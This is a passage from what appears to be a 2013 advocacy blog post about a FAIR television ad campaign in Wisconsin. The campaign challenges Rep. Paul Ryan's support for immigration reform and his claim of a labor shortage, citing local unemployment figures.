Paul Ryan (R-Wis-1) questioning his claim that Wisconsin has a <a href=\"http:\/\/paulryan.house.gov\/news\/documentsingle.aspx?DocumentID=344861#.UgFFTGT73rQ\">labor shortage<\/a>. While the overall unemployment in Wisconsin is 6.8%, much of the area that Ryan represents has significantly higher rates,\u00a0such as 12% in Racine, 10% in Milwaukee and 9% in his hometown of Janesville.<\/p>\n<p>Since Ryan has announced a series of <a href=\"http:\/\/www.fairus.org\/_blog\/amnesty_updates\/post\/rep-paul-ryan-town-hall-dates\/\">listening sessions throughout his district on August 13-15<\/a>, constituents and nearby residents will have ample opportunities to question his <a href=\"http:\/\/www.breitbart.com\/Big-Government\/2013\/07\/26\/Ryan-House-GOP-s-immigration-plan-to-conference-Senate-bill-for-comprehensive-end-product-resumes-in-October?utm_source=twitterfeed&amp;utm_medium=twitter\">support of amnesty<\/a>.<\/p>\n<p><iframe loading=\"lazy\" src=\"\/\/www.youtube.com\/embed\/REzmlj6wdLE\" height=\"315\" width=\"560\" allowfullscreen=\"\" frameborder=\"0\"><\/iframe><\/p>\n<p>The Ryan TV ad is the beginning of a <a href=\"http:\/\/www.fairus.org\/news\/time-for-answers-from-paul-ryan\">larger ad campaign<\/a> that will be targeted throughout the country:<\/p>\n<p style=\"padding-left: 30px;\">Beginning the week of August 5, television ads will begin running in Wisconsin taking issue with Rep. Paul Ryan&#8217;s support for massive increases in immigration to the United States. The ads are being paid for by the Federation for American Immigration Reform (FAIR), a national nonpartisan organization that supports enforcement of U.S. immigration laws and overall reductions in immigration to restore a fair labor market for all.
